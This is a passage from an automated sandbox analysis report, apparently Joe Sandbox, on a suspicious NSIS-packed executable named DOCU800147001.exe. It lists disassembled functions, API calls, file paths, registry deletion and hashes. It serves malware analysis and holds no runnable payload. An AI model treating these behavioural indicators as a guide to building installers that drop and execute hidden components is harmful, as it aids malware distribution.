                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                • String ID: "C:\Users\user\Desktop\DOCU800147001.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DOCU800147001.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                • API String ID: 4283519449-3087909052
                                                • Opcode ID: 525d4b8ba48f962f617f4a8d1a80fde7623c146091088817e6136f17cedd8ab8
                                                • Instruction ID: f4f743896e3c3c29250869f87ba77b7665a96188decf60a66d8326f59fe02ce9
                                                • Opcode Fuzzy Hash: 525d4b8ba48f962f617f4a8d1a80fde7623c146091088817e6136f17cedd8ab8
                                                • Instruction Fuzzy Hash: 3C51D271941204AFDB109F65DE89B9E7BA8EF41354F10413BFA00B62D1D7BC9D818BAD
                                                Function 0040173F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 536 40173f-401762 call 4029ff call 405677 541 401764-40176a call 405b7a 536->541 542 40176c-40177e call 405b7a call 40560a lstrcatA 536->542 547 401783-401789 call 405de5 541->547 542->547 552 40178e-401792 547->552 553 401794-40179e call 405e7e 552->553 554 4017c5-4017c8 552->554 561 4017b0-4017c2 553->561 562 4017a0-4017ae CompareFileTime 553->562 556 4017d0-4017ec call 40580b 554->556 557 4017ca-4017cb call 4057e6 554->557 564 401864-40188d call 404e65 call 402e64 556->564 565 4017ee-4017f1 556->565 557->556 561->554 562->561 579 401895-4018a1 SetFileTime 564->579 580 40188f-401893 564->580 566 4017f3-401835 call 405b7a * 2 call 405b9c call 405b7a call 40538e 565->566 567 401846-401850 call 404e65 565->567 566->552 599 40183b-40183c 566->599 577 401859-40185f 567->577 581 40289d 577->581 583 4018a7-4018b2 CloseHandle 579->583 580->579 580->583 585 40289f-4028a3 581->585 586 402894-402897 583->586 587 4018b8-4018bb 583->587 586->581 589 4018d0-4018d3 call 405b9c 587->589 590 4018bd-4018ce call 405b9c lstrcatA 587->590 594 4018d8-40222d call 40538e 589->594 590->594 594->585 599->577 602 40183e-40183f 599->602 602->567
                                                APIs
                                                • lstrcatA.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds,00000000,00000000,00000031), ref: 0040177E
                                                • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds,00000000,00000000,00000031), ref: 004017A8
                                                  • Part of subcall function 00405B7A: lstrcpynA.KERNEL32(?,?,00000400,0040313B,Pantaloons Setup,NSIS Error), ref: 00405B87
                                                  • Part of subcall function 00404E65: lstrlenA.KERNEL32(Completed,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000,?), ref: 00404E9E
                                                  • Part of subcall function 00404E65: lstrlenA.KERNEL32(00402F9E,Completed,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000), ref: 00404EAE
                                                  • Part of subcall function 00404E65: lstrcatA.KERNEL32(Completed,00402F9E,00402F9E,Completed,00000000,0078EAA8,007890A8), ref: 00404EC1
                                                  • Part of subcall function 00404E65: SetWindowTextA.USER32(Completed,Completed), ref: 00404ED3
                                                  • Part of subcall function 00404E65: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EF9
                                                  • Part of subcall function 00404E65: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F13
                                                  • Part of subcall function 00404E65: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F21
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds$C:\Users\user\AppData\Local\Temp\nsx7F0.tmp\nsExec.dll$ExecToStack$error
                                                • API String ID: 1941528284-478207605
                                                • Opcode ID: 62498af3186e5d7a4317b127f62fbcb2664a9f9e23df6de8b5d8142ed52635d7
                                                • Instruction ID: a6908968e7e0a660026174725ff56955a6f1faca608fb57c98e9df4a9bbbb5a6
                                                • Opcode Fuzzy Hash: 62498af3186e5d7a4317b127f62fbcb2664a9f9e23df6de8b5d8142ed52635d7
                                                • Instruction Fuzzy Hash: 5841D771904618BADB107BB5CC45DAF3A79EF42369F20833BF422B10E2C73C5A419A6D
                                                Function 00404E65 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 603 404e65-404e7a 604 404f30-404f34 603->604 605 404e80-404e92 603->605 606 404e94-404e98 call 405b9c 605->606 607 404e9d-404ea9 lstrlenA 605->607 606->607 609 404ec6-404eca 607->609 610 404eab-404ebb lstrlenA 607->610 612 404ed9-404edd 609->612 613 404ecc-404ed3 SetWindowTextA 609->613 610->604 611 404ebd-404ec1 lstrcatA 610->611 611->609 614 404f23-404f25 612->614 615 404edf-404f21 SendMessageA * 3 612->615 613->612 614->604 616 404f27-404f2a 614->616 615->614 616->604
                                                APIs
                                                • lstrlenA.KERNEL32(Completed,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000,?), ref: 00404E9E
                                                • lstrlenA.KERNEL32(00402F9E,Completed,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000), ref: 00404EAE
                                                • lstrcatA.KERNEL32(Completed,00402F9E,00402F9E,Completed,00000000,0078EAA8,007890A8), ref: 00404EC1
                                                • SetWindowTextA.USER32(Completed,Completed), ref: 00404ED3
                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EF9
                                                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F13
                                                • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F21
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID: Completed
                                                • API String ID: 2531174081-3087654605
                                                • Opcode ID: 933784eb7198931abdf335ddeca554807fb146d71386ffc1ced885ec7dbc7604
                                                • Instruction ID: f74adcbe277517a17f303532725ec1791e789a00cb50e63f9a7244524c8ab7df
                                                • Opcode Fuzzy Hash: 933784eb7198931abdf335ddeca554807fb146d71386ffc1ced885ec7dbc7604
                                                • Instruction Fuzzy Hash: A3219DB1900118BEDB119FA5DD849DFBFB9EF45354F14807AF504B6291C6389E40CBA8
                                                Function 00402E64 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 617 402e64-402e7a 618 402e83-402e8b 617->618 619 402e7c 617->619 620 402e94-402e99 618->620 621 402e8d 618->621 619->618 622 402ea9-402eb6 call 40306a 620->622 623 402e9b-402ea4 call 403080 620->623 621->620 627 403058 622->627 628 402ebc-402ec0 622->628 623->622 629 40305a-40305b 627->629 630 402ec6-402ee9 GetTickCount 628->630 631 402ff9-402ffb 628->631 634 403063-403067 629->634 635 403060 630->635 636 402eef 630->636 632 403045-403048 631->632 633 402ffd-403000 631->633 639 40304a 632->639 640 40304d-403056 call 40306a 632->640 633->635 637 403002 633->637 635->634 638 402ef4-402efc 636->638 642 403007-40300d 637->642 643 402f01-402f0a call 40306a 638->643 644 402efe 638->644 639->640 640->627 649 40305d 640->649 646 403012-40301b call 40306a 642->646 647 40300f 642->647 643->627 653 402f10-402f19 643->653 644->643 646->627 654 40301d-403030 WriteFile 646->654 647->646 649->635 655 402f1f-402f3f call 405f85 653->655 656 403032-403035 654->656 657 402ff5-402ff7 654->657 662 402ff1-402ff3 655->662 663 402f45-402f5c GetTickCount 655->663 656->657 659 403037-403041 656->659 657->629 659->642 661 403043 659->661 661->635 662->629 664 402fa1-402fa5 663->664 665 402f5e-402f66 663->665 668 402fe6-402fe9 664->668 669 402fa7-402faa 664->669 666 402f68-402f6c 665->666 667 402f6e-402f99 MulDiv wsprintfA call 404e65 665->667 666->664 666->667 674 402f9e 667->674 668->638 673 402fef 668->673 671 402fcc-402fd7 669->671 672 402fac-402fc0 WriteFile 669->672 676 402fda-402fde 671->676 672->657 675 402fc2-402fc5 672->675 673->635 674->664 675->657 677 402fc7-402fca 675->677 676->655 678 402fe4 676->678 677->676 678->635
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00402EC6
                                                • GetTickCount.KERNEL32 ref: 00402F4D
                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F7A
                                                • wsprintfA.USER32 ref: 00402F8A
                                                • WriteFile.KERNELBASE(00000000,00000000,0078EAA8,7FFFFFFF,00000000), ref: 00402FB8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: CountTick$FileWritewsprintf
                                                • String ID: ... %d%%
                                                • API String ID: 4209647438-2449383134
                                                • Opcode ID: 1795076decc1ce6f37a3ba71e83596e3ad7db5dc1ea6cebba5f0826b95c15386
                                                • Instruction ID: a1131f75f2d1942715029d12413e0120ad3f5e0bd8d3acfe7200d6871225b0cc
                                                • Opcode Fuzzy Hash: 1795076decc1ce6f37a3ba71e83596e3ad7db5dc1ea6cebba5f0826b95c15386
                                                • Instruction Fuzzy Hash: F4515A7190121AABCF10DF69DA48A9F7BB8BB04355F14413BF900B72C4C7789E50DBAA
                                                Function 00401F68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 679 401f68-401f74 680 401f7a-401f90 call 4029ff * 2 679->680 681 40202f-402031 679->681 692 401f92-401f9d GetModuleHandleA 680->692 693 401f9f-401fad LoadLibraryExA 680->693 682 40217e-402183 call 401423 681->682 688 402894-4028a3 682->688 689 402665-40266c 682->689 689->688 692->693 695 401faf-401fbc GetProcAddress 692->695 693->695 696 402028-40202a 693->696 697 401ffb-402000 call 404e65 695->697 698 401fbe-401fc4 695->698 696->682 703 402005-402008 697->703 700 401fc6-401fd2 call 401423 698->700 701 401fdd-401ff9 698->701 700->703 710 401fd4-401fdb 700->710 701->703 703->688 706 40200e-402016 call 4035a3 703->706 706->688 711 40201c-402023 FreeLibrary 706->711 710->703 711->688
                                                APIs
                                                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F93
                                                  • Part of subcall function 00404E65: lstrlenA.KERNEL32(Completed,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000,?), ref: 00404E9E
                                                  • Part of subcall function 00404E65: lstrlenA.KERNEL32(00402F9E,Completed,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000), ref: 00404EAE
                                                  • Part of subcall function 00404E65: lstrcatA.KERNEL32(Completed,00402F9E,00402F9E,Completed,00000000,0078EAA8,007890A8), ref: 00404EC1
                                                  • Part of subcall function 00404E65: SetWindowTextA.USER32(Completed,Completed), ref: 00404ED3
                                                  • Part of subcall function 00404E65: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EF9
                                                  • Part of subcall function 00404E65: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F13
                                                  • Part of subcall function 00404E65: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F21
                                                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                                • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                • String ID: error
                                                • API String ID: 2987980305-1574812785
                                                • Opcode ID: daf8f493f50fe6af5241a246699056680acc54043a3a15048780450689c6adc2
                                                • Instruction ID: 69b9336aaa8ae6558f820ae1f090152185eb0d0d08fc7590899cf316edf80682
                                                • Opcode Fuzzy Hash: daf8f493f50fe6af5241a246699056680acc54043a3a15048780450689c6adc2
                                                • Instruction Fuzzy Hash: 7021EB72904215ABDF107FA4CE4DA6E79B0AB44358F24423BF611B62D0D7BC4942EA5E
                                                Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 712 4015b3-4015c6 call 4029ff call 4056a3 717 4015c8-4015e3 call 405635 CreateDirectoryA 712->717 718 40160a-40160d 712->718 727 401600-401608 717->727 728 4015e5-4015f0 GetLastError 717->728 719 401638-402183 call 401423 718->719 720 40160f-40162a call 401423 call 405b7a SetCurrentDirectoryA 718->720 733 402894-4028a3 719->733 734 402665-40266c 719->734 720->733 737 401630-401633 720->737 727->717 727->718 729 4015f2-4015fb GetFileAttributesA 728->729 730 4015fd 728->730 729->727 729->730 730->727 734->733 737->733
                                                APIs
                                                  • Part of subcall function 004056A3: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,?,0040570F,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,?,?,76233410,0040545A,?,C:\Users\user\AppData\Local\Temp\,76233410,00000000), ref: 004056B1
                                                  • Part of subcall function 004056A3: CharNextA.USER32(00000000), ref: 004056B6
                                                  • Part of subcall function 004056A3: CharNextA.USER32(00000000), ref: 004056CA
                                                • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds,00000000,00000000,000000F0), ref: 00401622
                                                Strings
                                                • C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds, xrefs: 00401617
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                • String ID: C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds
                                                • API String ID: 3751793516-2159730412
                                                • Opcode ID: 07d7fbb98cc222dbf4f850f848f42c99798dc9f07bdd3088a9de5fa57da8bac3
                                                • Instruction ID: fe130fe747d7612bd359b5bee5f77481d56b475851a7b43d3d194bb92abb4f34
                                                • Opcode Fuzzy Hash: 07d7fbb98cc222dbf4f850f848f42c99798dc9f07bdd3088a9de5fa57da8bac3
                                                • Instruction Fuzzy Hash: AF112531908150ABDB116F751D4496F37B0AA62366728073FF492B22E2C23C0942962E
                                                Function 0040583A Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 739 40583a-405844 740 405845-405870 GetTickCount GetTempFileNameA 739->740 741 405872-405874 740->741 742 40587f-405881 740->742 741->740 744 405876 741->744 743 405879-40587c 742->743 744->743
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 0040584E
                                                • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405868
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: "C:\Users\user\Desktop\DOCU800147001.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-828672664
                                                • Opcode ID: 165f25902c12276048ad14c3faa9af412f6aa489c6d0a6d50344be84ac3f20e0
                                                • Instruction ID: 52717d4cd68eb3ad2d5284e259dd09d89c77f45c9904e037c47a6ea27e695b51
                                                • Opcode Fuzzy Hash: 165f25902c12276048ad14c3faa9af412f6aa489c6d0a6d50344be84ac3f20e0
                                                • Instruction Fuzzy Hash: 24F05E366482086BDB109E56DC44F9A7B98DB95750F14C02AFE44AA180D6B0D9648B99
                                                Function 00402A3F Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 745 402a3f-402a68 RegOpenKeyExA 746 402ad3-402ad7 745->746 747 402a6a-402a75 745->747 748 402a90-402aa0 RegEnumKeyA 747->748 749 402aa2-402ab4 RegCloseKey call 405ea5 748->749 750 402a77-402a7a 748->750 758 402ab6-402ac5 749->758 759 402ada-402ae0 749->759 751 402ac7-402aca RegCloseKey 750->751 752 402a7c-402a8e call 402a3f 750->752 754 402ad0-402ad2 751->754 752->748 752->749 754->746 758->746 759->754 760 402ae2-402af0 RegDeleteKeyA 759->760 760->754 761 402af2 760->761 761->746
                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000000,?), ref: 00402A60
                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9C
                                                • RegCloseKey.ADVAPI32(?), ref: 00402AA5
                                                • RegCloseKey.ADVAPI32(?), ref: 00402ACA
                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: Close$DeleteEnumOpen
                                                • String ID:
